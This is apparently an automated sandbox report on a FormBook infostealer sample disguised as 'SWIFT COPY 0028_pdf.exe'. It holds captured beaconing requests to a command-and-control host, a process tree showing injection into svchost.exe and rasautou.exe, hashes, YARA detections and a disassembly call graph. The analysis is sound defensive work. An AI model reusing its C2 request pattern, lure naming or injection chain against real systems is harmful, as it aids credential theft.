                                                                                  Data Ascii: GR54yHZ8=rNaa5F/cLJDqctX6mAxzxZhxsDjhCEhw5F7RE4WAMlTrobR30mnLhTHvMY+fJ6hApDVctJaisHYcDKkjIjcwIiS5HyPe6RbuKlz0aiMr7xRPZCegSDq0SHCcN585t/n3LurzAzCA1OSROTN/i2Ddl1JienO25PWKkeUwyM6sVZMVsWx8KfJvHxgpqZ1/mbgG/5vQC/1BqXsgexSiMwPi807OxK0/1rLDDysNjZy9GVrNyvrVmt+fwQVFlOByfnTmSJxI4t27aqg/Ect3bprLC2KylmCN3WQ3473YP2OZyLpemGznpfTjalUX7DRSARRn0mgwGYcpn4yqp/q7Q7ZlksKJeXpsop6bAjc7T22HKrQkVrpX/IyBu+nZ+2tioUymJjsOE2gUtd0Fpa2YOabPAdfV7MRC8v2sobcYOqiJY7Md1+LWOn9inxvhRlMccqa8DSI/zBkXsGCCXLe928h9y/q4mbv6TT7TkUl2baQxotnM9jNx2O4lDGIzIsY8t8zKM1Eum9vA/SfxgsBpkoYGNmoztkZ1mj9gk0F2AOSLQZTu4Adg8MxpR34P5EBz+0efpbqX8k9jzdlmO5hCaAqMe0/Wlmoiv9LFw/QV2dsZ9c0ubKx5AjI/QeXmpRXyGghZ9vAIhL50irHVPK03S/s5TSh91lygrheE+QkwXoetEJHEr3j+cNZ4LFh46/z6ESVY/LIhNYDWWKYU08TxuhM2EoyiozmuuOfA6AfleLgUclt2nDZIYxNykD0oOknTf3NxobVfuy4R/jatTnmNPdP523y0IVHtFGpiXw6g7TuIwecMpyJAJPjE7hRBv7KwaX+MpXYOY6CDWriCejT4a7TxhFqAV7ggACBHPB1MhuLzTyl6Fg0M/NY3djc88q/ezgNTf/IC3RW4jw1gmb4v40O76tzUcxfSWX3UNf4rJeCRxwyyyhDyDCweRMiVsz1u0tB+X0peoV1BGHx/TpsondU06uvKnk+pngxACt9PJ7lSefg [TRUNCATED]
                                                                                  Nov 20, 2024 08:35:19.855067968 CET676INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:35:19 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Expires: Wed, 20 Nov 2024 07:35:19 GMT
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56c33b6aa5c439-EWR
                                                                                  Content-Encoding: gzip
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1499&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1865&delivery_rate=0&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a
                                                                                  Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh
                                                                                  Nov 20, 2024 08:35:19.855386972 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  60192.168.2.650051104.21.4.93803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:35:21.755423069 CET560OUTGET /ymqd/?GR54yHZ8=mPy66x3IfJKracCH7wZR1aUAlhDvAV8zvELzb8KITnbno7Ubu3OHpx/EILO3OYxVnkt90JirtFkeXZQsCCcXJBbLSRzz4hD+Fif5IhUF/AIFPB6kYSO8O2aHFbYKqoGjWs62c28=&9xn=fHadNpk8MVax HTTP/1.1
                                                                                  Host: www.nonpressure.beauty
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:35:22.429676056 CET676INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:35:22 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Expires: Wed, 20 Nov 2024 07:35:22 GMT
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56c34b793d7291-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1809&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=560&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 39 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>0


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:02:31:16
                                                                                  Start date:20/11/2024
                                                                                  Path:C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe"
                                                                                  Imagebase:0x920000
                                                                                  File size:1'217'536 bytes
                                                                                  MD5 hash:AA99009FF8C996CCEFD78EB8A4CE1D7E
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:02:31:18
                                                                                  Start date:20/11/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe"
                                                                                  Imagebase:0x570000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2315508419.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2314669018.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2316526821.0000000006480000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:02:31:26
                                                                                  Start date:20/11/2024
                                                                                  Path:C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe"
                                                                                  Imagebase:0x6c0000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4613219723.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:02:31:28
                                                                                  Start date:20/11/2024
                                                                                  Path:C:\Windows\SysWOW64\rasautou.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\rasautou.exe"
                                                                                  Imagebase:0x290000
                                                                                  File size:15'360 bytes
                                                                                  MD5 hash:DFDBEDC2ED47CBABC13CCC64E97868F3
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4613350413.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4602405101.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4613399783.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:6
                                                                                  Start time:02:31:42
                                                                                  Start date:20/11/2024
                                                                                  Path:C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe"
                                                                                  Imagebase:0x6c0000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4613324935.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:9
                                                                                  Start time:02:31:54
                                                                                  Start date:20/11/2024
                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                  Imagebase:0x7ff728280000
                                                                                  File size:676'768 bytes
                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:4%
                                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                                    Signature Coverage:6.9%
                                                                                    Total number of Nodes:2000
                                                                                    Total number of Limit Nodes:66
                                                                                    execution_graph 93836 923742 93837 92374b 93836->93837 93838 9237c6 93837->93838 93839 9237c8 93837->93839 93840 923769 93837->93840 93841 9237ab DefWindowProcW 93838->93841 93842 991e00 93839->93842 93843 9237ce 93839->93843 93844 923776 93840->93844 93845 92382c PostQuitMessage 93840->93845 93846 9237b9 93841->93846 93891 922ff6 16 API calls 93842->93891 93847 9237d3 93843->93847 93848 9237f6 SetTimer RegisterWindowMessageW 93843->93848 93850 991e88 93844->93850 93851 923781 93844->93851 93845->93846 93852 9237da KillTimer 93847->93852 93853 991da3 93847->93853 93848->93846 93855 92381f CreatePopupMenu 93848->93855 93906 964ddd 60 API calls _memset 93850->93906 93856 923836 93851->93856 93857 923789 93851->93857 93888 923847 Shell_NotifyIconW _memset 93852->93888 93860 991da8 93853->93860 93861 991ddc MoveWindow 93853->93861 93854 991e27 93892 93e312 331 API calls Mailbox 93854->93892 93855->93846 93881 93eb83 93856->93881 93864 991e6d 93857->93864 93865 923794 93857->93865 93867 991dcb SetFocus 93860->93867 93868 991dac 93860->93868 93861->93846 93864->93841 93905 95a5f3 48 API calls 93864->93905 93870 92379f 93865->93870 93871 991e58 93865->93871 93866 991e9a 93866->93841 93866->93846 93867->93846 93868->93870 93872 991db5 93868->93872 93869 9237ed 93889 92390f DeleteObject DestroyWindow Mailbox 93869->93889 93870->93841 93893 923847 Shell_NotifyIconW _memset 93870->93893 93904 9655bd 70 API calls _memset 93871->93904 93890 922ff6 16 API calls 93872->93890 93877 991e68 93877->93846 93879 991e4c 93894 924ffc 93879->93894 93882 93eb9a _memset 93881->93882 93883 93ec1c 93881->93883 93907 9251af 93882->93907 93883->93846 93885 93ec05 KillTimer SetTimer 93885->93883 93886 93ebc1 93886->93885 93887 993c7a Shell_NotifyIconW 93886->93887 93887->93885 93888->93869 93889->93846 93890->93846 93891->93854 93892->93870 93893->93879 93895 925027 _memset 93894->93895 94050 924c30 93895->94050 93898 9250ac 93900 993d28 Shell_NotifyIconW 93898->93900 93901 9250ca Shell_NotifyIconW 93898->93901 93902 9251af 50 API calls 93901->93902 93903 9250df 93902->93903 93903->93838 93904->93877 93905->93838 93906->93866 93908 9251cb 93907->93908 93928 9252a2 Mailbox 93907->93928 93929 926b0f 93908->93929 93911 9251e6 93934 926a63 93911->93934 93912 993ca1 LoadStringW 93915 993cbb 93912->93915 93914 9251fb 93914->93915 93917 92520c 93914->93917 93916 92510d 48 API calls 93915->93916 93922 993cc5 93916->93922 93918 925216 93917->93918 93919 9252a7 93917->93919 93945 92510d 93918->93945 93954 926eed 93919->93954 93924 925220 _memset _wcscpy 93922->93924 93958 92518c 93922->93958 93926 925288 Shell_NotifyIconW 93924->93926 93925 993ce7 93927 92518c 48 API calls 93925->93927 93926->93928 93927->93924 93928->93886 93968 93f4ea 93929->93968 93931 926b34 93977 926b4a 93931->93977 93935 926adf 93934->93935 93938 926a6f __wsetenvp 93934->93938 94012 92b18b 93935->94012 93937 926ab6 _memcpy_s 93937->93914 93939 926ad7 93938->93939 93940 926a8b 93938->93940 94011 92c369 48 API calls 93939->94011 93941 926b4a 48 API calls 93940->93941 93943 926a95 93941->93943 94002 93ee75 93943->94002 93946 92511f 93945->93946 93947 991be7 93945->93947 94024 92b384 93946->94024 94033 95a58f 48 API calls _memcpy_s 93947->94033 93950 92512b 93950->93924 93951 991bf1 93952 926eed 48 API calls 93951->93952 93953 991bf9 Mailbox 93952->93953 93955 926f00 93954->93955 93956 926ef8 93954->93956 93955->93924 94039 92dd47 48 API calls _memcpy_s 93956->94039 93959 925197 93958->93959 93960 991ace 93959->93960 93961 92519f 93959->93961 93963 926b4a 48 API calls 93960->93963 94040 925130 93961->94040 93965 991adb __wsetenvp 93963->93965 93964 9251aa 93964->93925 93966 93ee75 48 API calls 93965->93966 93967 991b07 _memcpy_s 93966->93967 93970 93f4f2 __calloc_impl 93968->93970 93971 93f50c 93970->93971 93972 93f50e std::exception::exception 93970->93972 93980 94395c 93970->93980 93971->93931 93994 946805 RaiseException 93972->93994 93974 93f538 93995 94673b 47 API calls _free 93974->93995 93976 93f54a 93976->93931 93978 93f4ea 48 API calls 93977->93978 93979 9251d9 93978->93979 93979->93911 93979->93912 93981 9439d7 __calloc_impl 93980->93981 93990 943968 __calloc_impl 93980->93990 94001 947c0e 47 API calls __getptd_noexit 93981->94001 93982 943973 93982->93990 93996 9481c2 47 API calls 2 library calls 93982->93996 93997 94821f 47 API calls 8 library calls 93982->93997 93998 941145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93982->93998 93985 94399b RtlAllocateHeap 93985->93990 93993 9439cf 93985->93993 93987 9439c3 93999 947c0e 47 API calls __getptd_noexit 93987->93999 93990->93982 93990->93985 93990->93987 93991 9439c1 93990->93991 94000 947c0e 47 API calls __getptd_noexit 93991->94000 93993->93970 93994->93974 93995->93976 93996->93982 93997->93982 93999->93991 94000->93993 94001->93993 94004 93f4ea __calloc_impl 94002->94004 94003 94395c __crtGetStringTypeA_stat 47 API calls 94003->94004 94004->94003 94005 93f50c 94004->94005 94006 93f50e std::exception::exception 94004->94006 94005->93937 94016 946805 RaiseException 94006->94016 94008 93f538 94017 94673b 47 API calls _free 94008->94017 94010 93f54a 94010->93937 94011->93937 94013 92b1a2 _memcpy_s 94012->94013 94014 92b199 94012->94014 94013->93937 94014->94013 94018 92bdfa 94014->94018 94016->94008 94017->94010 94019 92be0d 94018->94019 94023 92be0a _memcpy_s 94018->94023 94020 93f4ea 48 API calls 94019->94020 94021 92be17 94020->94021 94022 93ee75 48 API calls 94021->94022 94022->94023 94023->94013 94025 92b3c5 _memcpy_s 94024->94025 94026 92b392 94024->94026 94025->93950 94026->94025 94027 92b3b8 94026->94027 94028 92b3fd 94026->94028 94034 92bb85 94027->94034 94029 93f4ea 48 API calls 94028->94029 94031 92b407 94029->94031 94032 93f4ea 48 API calls 94031->94032 94032->94025 94033->93951 94035 92bb9b 94034->94035 94038 92bb96 _memcpy_s 94034->94038 94036 991b77 94035->94036 94037 93ee75 48 API calls 94035->94037 94037->94038 94038->94025 94039->93955 94041 92513f __wsetenvp 94040->94041 94042 925151 94041->94042 94043 991b27 94041->94043 94044 92bb85 48 API calls 94042->94044 94045 926b4a 48 API calls 94043->94045 94046 92515e _memcpy_s 94044->94046 94047 991b34 94045->94047 94046->93964 94048 93ee75 48 API calls 94047->94048 94049 991b57 _memcpy_s 94048->94049 94051 924c44 94050->94051 94052 993c33 94050->94052 94051->93898 94054 965819 61 API calls _W_store_winword 94051->94054 94052->94051 94053 993c3c DestroyIcon 94052->94053 94053->94051 94054->93898 94055 998eb8 94059 96a635 94055->94059 94057 998ec3 94058 96a635 84 API calls 94057->94058 94058->94057 94060 96a66f 94059->94060 94065 96a642 94059->94065 94060->94057 94061 96a671 94091 93ec4e 81 API calls 94061->94091 94063 96a676 94070 92936c 94063->94070 94065->94060 94065->94061 94065->94063 94068 96a669 94065->94068 94066 96a67d 94067 92510d 48 API calls 94066->94067 94067->94060 94090 934525 61 API calls _memcpy_s 94068->94090 94071 929384 94070->94071 94088 929380 94070->94088 94072 994cbd __i64tow 94071->94072 94073 994bbf 94071->94073 94074 929398 94071->94074 94081 9293b0 __itow Mailbox _wcscpy 94071->94081 94075 994bc8 94073->94075 94076 994ca5 94073->94076 94092 94172b 80 API calls 3 library calls 94074->94092 94075->94081 94082 994be7 94075->94082 94099 94172b 80 API calls 3 library calls 94076->94099 94078 93f4ea 48 API calls 94080 9293ba 94078->94080 94080->94088 94093 92ce19 94080->94093 94081->94078 94083 93f4ea 48 API calls 94082->94083 94085 994c04 94083->94085 94086 93f4ea 48 API calls 94085->94086 94087 994c2a 94086->94087 94087->94088 94089 92ce19 48 API calls 94087->94089 94088->94066 94089->94088 94090->94060 94091->94063 94092->94081 94094 92ce28 __wsetenvp 94093->94094 94095 93ee75 48 API calls 94094->94095 94096 92ce50 _memcpy_s 94095->94096 94097 93f4ea 48 API calls 94096->94097 94098 92ce66 94097->94098 94098->94088 94099->94081 94100 92f030 94103 933b70 94100->94103 94102 92f03c 94104 9342a5 94103->94104 94105 933bc8 94103->94105 94210 96cc5c 86 API calls 4 library calls 94104->94210 94106 933bef 94105->94106 94108 996fd1 94105->94108 94110 996f7e 94105->94110 94117 996f9b 94105->94117 94107 93f4ea 48 API calls 94106->94107 94109 933c18 94107->94109 94198 97ceca 331 API calls Mailbox 94108->94198 94113 93f4ea 48 API calls 94109->94113 94110->94106 94114 996f87 94110->94114 94112 996fbe 94197 96cc5c 86 API calls 4 library calls 94112->94197 94132 933c2c _memcpy_s __wsetenvp 94113->94132 94195 97d552 331 API calls Mailbox 94114->94195 94117->94112 94196 97da0e 331 API calls 2 library calls 94117->94196 94120 9973b0 94120->94102 94121 99737a 94216 96cc5c 86 API calls 4 library calls 94121->94216 94122 997297 94206 96cc5c 86 API calls 4 library calls 94122->94206 94126 93dce0 53 API calls 94126->94132 94128 99707e 94199 96cc5c 86 API calls 4 library calls 94128->94199 94132->94104 94132->94121 94132->94122 94132->94126 94132->94128 94134 92d645 53 API calls 94132->94134 94136 93f4ea 48 API calls 94132->94136 94138 9340df 94132->94138 94139 9972d2 94132->94139 94140 997350 94132->94140 94142 92fe30 331 API calls 94132->94142 94145 9972e9 94132->94145 94146 997363 94132->94146 94149 9342f2 94132->94149 94150 926a63 48 API calls 94132->94150 94153 99714c 94132->94153 94155 933f2b 94132->94155 94156 99733f 94132->94156 94158 92d286 48 API calls 94132->94158 94162 93ee75 48 API calls 94132->94162 94163 926eed 48 API calls 94132->94163 94167 9971e1 94132->94167 94175 92d9a0 53 API calls __cinit 94132->94175 94176 92d83d 53 API calls 94132->94176 94177 92cdb9 48 API calls 94132->94177 94178 92d6e9 94132->94178 94182 93c15c 48 API calls 94132->94182 94183 93c050 94132->94183 94194 93becb 331 API calls 94132->94194 94200 92dcae 50 API calls Mailbox 94132->94200 94201 97ccdc 48 API calls 94132->94201 94202 96a1eb 50 API calls 94132->94202 94134->94132 94136->94132 94207 96cc5c 86 API calls 4 library calls 94138->94207 94208 96cc5c 86 API calls 4 library calls 94139->94208 94214 96cc5c 86 API calls 4 library calls 94140->94214 94142->94132 94209 96cc5c 86 API calls 4 library calls 94145->94209 94215 96cc5c 86 API calls 4 library calls 94146->94215 94217 96cc5c 86 API calls 4 library calls 94149->94217 94150->94132 94203 97ccdc 48 API calls 94153->94203 94155->94102 94213 96cc5c 86 API calls 4 library calls 94156->94213 94158->94132 94160 9971a1 94205 93c15c 48 API calls 94160->94205 94162->94132 94163->94132 94166 9971ce 94170 93c050 48 API calls 94166->94170 94167->94155 94212 96cc5c 86 API calls 4 library calls 94167->94212 94169 99715f 94169->94160 94204 97ccdc 48 API calls 94169->94204 94172 9971d6 94170->94172 94171 9971ab 94171->94104 94171->94166 94172->94167 94173 997313 94172->94173 94211 96cc5c 86 API calls 4 library calls 94173->94211 94175->94132 94176->94132 94177->94132 94179 92d6f4 94178->94179 94180 92d71b 94179->94180 94218 92d764 55 API calls 94179->94218 94180->94132 94182->94132 94184 93c064 94183->94184 94186 93c069 Mailbox 94183->94186 94219 93c1af 48 API calls 94184->94219 94191 93c077 94186->94191 94220 93c15c 48 API calls 94186->94220 94188 93f4ea 48 API calls 94189 93c108 94188->94189 94192 93f4ea 48 API calls 94189->94192 94190 93c152 94190->94132 94191->94188 94191->94190 94193 93c113 94192->94193 94193->94132 94194->94132 94195->94155 94196->94112 94197->94108 94198->94132 94199->94155 94200->94132 94201->94132 94202->94132 94203->94169 94204->94169 94205->94171 94206->94138 94207->94155 94208->94145 94209->94155 94210->94155 94211->94155 94212->94155 94213->94155 94214->94155 94215->94155 94216->94155 94217->94120 94218->94180 94219->94186 94220->94191 94221 92ef80 94222 933b70 331 API calls 94221->94222 94223 92ef8c 94222->94223 94224 9919cb 94229 922322 94224->94229 94226 9919d1 94262 940f0a 52 API calls __cinit 94226->94262 94228 9919db 94230 922344 94229->94230 94263 9226df 94230->94263 94237 92d7f7 48 API calls 94238 92238e 94237->94238 94239 92d7f7 48 API calls 94238->94239 94240 922398 94239->94240 94241 92d7f7 48 API calls 94240->94241 94242 9223de 94241->94242 94243 92d7f7 48 API calls 94242->94243 94244 9224c1 94243->94244 94276 92263f 94244->94276 94248 9224f1 94249 92d7f7 48 API calls 94248->94249 94250 9224fb 94249->94250 94305 922745 94250->94305 94252 922546 94253 922556 GetStdHandle 94252->94253 94254 9225b1 94253->94254 94255 99501d 94253->94255 94256 9225b7 CoInitialize 94254->94256 94255->94254 94257 995026 94255->94257 94256->94226 94312 9692d4 53 API calls 94257->94312 94259 99502d 94313 9699f9 CreateThread 94259->94313 94261 995039 CloseHandle 94261->94256 94262->94228 94314 922854 94263->94314 94266 926a63 48 API calls 94267 92234a 94266->94267 94268 92272e 94267->94268 94328 9227ec 6 API calls 94268->94328 94270 92237a 94271 92d7f7 94270->94271 94272 93f4ea 48 API calls 94271->94272 94273 92d818 94272->94273 94274 93f4ea 48 API calls 94273->94274 94275 922384 94274->94275 94275->94237 94277 92d7f7 48 API calls 94276->94277 94278 92264f 94277->94278 94279 92d7f7 48 API calls 94278->94279 94280 922657 94279->94280 94329 9226a7 94280->94329 94283 9226a7 48 API calls 94284 922667 94283->94284 94285 92d7f7 48 API calls 94284->94285 94286 922672 94285->94286 94287 93f4ea 48 API calls 94286->94287 94288 9224cb 94287->94288 94289 9222a4 94288->94289 94290 9222b2 94289->94290 94291 92d7f7 48 API calls 94290->94291 94292 9222bd 94291->94292 94293 92d7f7 48 API calls 94292->94293 94294 9222c8 94293->94294 94295 92d7f7 48 API calls 94294->94295 94296 9222d3 94295->94296 94297 92d7f7 48 API calls 94296->94297 94298 9222de 94297->94298 94299 9226a7 48 API calls 94298->94299 94300 9222e9 94299->94300 94301 93f4ea 48 API calls 94300->94301 94302 9222f0 94301->94302 94303 9222f9 RegisterWindowMessageW 94302->94303 94304 991fe7 94302->94304 94303->94248 94306 995f4d 94305->94306 94307 922755 94305->94307 94334 96c942 50 API calls 94306->94334 94308 93f4ea 48 API calls 94307->94308 94311 92275d 94308->94311 94310 995f58 94311->94252 94312->94259 94313->94261 94335 9699df 54 API calls 94313->94335 94321 922870 94314->94321 94317 922870 48 API calls 94318 922864 94317->94318 94319 92d7f7 48 API calls 94318->94319 94320 922716 94319->94320 94320->94266 94322 92d7f7 48 API calls 94321->94322 94323 92287b 94322->94323 94324 92d7f7 48 API calls 94323->94324 94325 922883 94324->94325 94326 92d7f7 48 API calls 94325->94326 94327 92285c 94326->94327 94327->94317 94328->94270 94330 92d7f7 48 API calls 94329->94330 94331 9226b0 94330->94331 94332 92d7f7 48 API calls 94331->94332 94333 92265f 94332->94333 94333->94283 94334->94310 94336 99197b 94341 93dd94 94336->94341 94340 99198a 94342 93f4ea 48 API calls 94341->94342 94343 93dd9c 94342->94343 94344 93ddb0 94343->94344 94349 93df3d 94343->94349 94348 940f0a 52 API calls __cinit 94344->94348 94348->94340 94350 93df46 94349->94350 94352 93dda8 94349->94352 94381 940f0a 52 API calls __cinit 94350->94381 94353 93ddc0 94352->94353 94354 92d7f7 48 API calls 94353->94354 94355 93ddd7 GetVersionExW 94354->94355 94356 926a63 48 API calls 94355->94356 94357 93de1a 94356->94357 94382 93dfb4 94357->94382 94361 9924c8 94365 93debb 94367 93dee3 94365->94367 94368 93df31 GetSystemInfo 94365->94368 94366 93dea4 GetCurrentProcess 94399 93df5f LoadLibraryA GetProcAddress 94366->94399 94393 93e00c 94367->94393 94371 93df0e 94368->94371 94373 93df21 94371->94373 94374 93df1c FreeLibrary 94371->94374 94373->94344 94374->94373 94375 93df29 GetSystemInfo 94378 93df03 94375->94378 94376 93def9 94396 93dff4 94376->94396 94378->94371 94380 93df09 FreeLibrary 94378->94380 94380->94371 94381->94352 94383 93dfbd 94382->94383 94384 92b18b 48 API calls 94383->94384 94385 93de22 94384->94385 94386 926571 94385->94386 94387 92657f 94386->94387 94388 92b18b 48 API calls 94387->94388 94389 92658f 94388->94389 94389->94361 94390 93df77 94389->94390 94400 93df89 94390->94400 94404 93e01e 94393->94404 94397 93e00c 2 API calls 94396->94397 94398 93df01 GetNativeSystemInfo 94397->94398 94398->94378 94399->94365 94401 93dea0 94400->94401 94402 93df92 LoadLibraryA 94400->94402 94401->94365 94401->94366 94402->94401 94403 93dfa3 GetProcAddress 94402->94403 94403->94401 94405 93def1 94404->94405 94406 93e027 LoadLibraryA 94404->94406 94405->94375 94405->94376 94406->94405 94407 93e038 GetProcAddress 94406->94407 94407->94405 94408 9919ba 94413 93c75a 94408->94413 94412 9919c9 94414 92d7f7 48 API calls 94413->94414 94415 93c7c8 94414->94415 94421 93d26c 94415->94421 94418 93c865 94419 93c881 94418->94419 94424 93d1fa 48 API calls _memcpy_s 94418->94424 94420 940f0a 52 API calls __cinit 94419->94420 94420->94412 